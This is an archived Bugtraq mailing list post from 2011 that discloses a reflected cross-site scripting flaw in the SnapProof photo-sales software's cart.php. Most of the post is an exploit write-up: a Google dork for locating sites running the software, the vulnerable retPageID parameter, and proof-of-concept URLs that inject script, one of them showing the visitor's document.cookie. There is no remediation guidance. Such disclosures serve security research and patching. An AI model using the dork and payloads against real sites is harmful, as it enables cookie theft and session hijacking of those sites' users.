Bugtraq mailing list archives
SnapProof (cart.php) Cross Site Scripting
From: difficult-511 () hotmail com
Date: Mon, 28 Feb 2011 21:20:29 -0700
########################################################## # Exploit Title: SnapProof (cart.php) Cross Site Scripting # Google Dork: inurl:"Created and powered by SnapProof" # home : www.D99Y.com # Date: 1/3/2011 # Author: Difficult 511 # Software Link: http://www.snapproof.com/ ########################################################## # # file : # # cart.php # # exploit : # # http://localhost/cart.php?retPageID= [ XSS ] # # http://localhost/cart.php?retPageID=<script>alert(12345)</script> # # http://localhost/cart.php?retPageID=<script>alert(document.cookie)</script> # ########################################################## Greetz : NassRawI and all members D99Y.com Enjoy :)
Current thread:
- SnapProof (cart.php) Cross Site Scripting difficult-511 (Mar 01)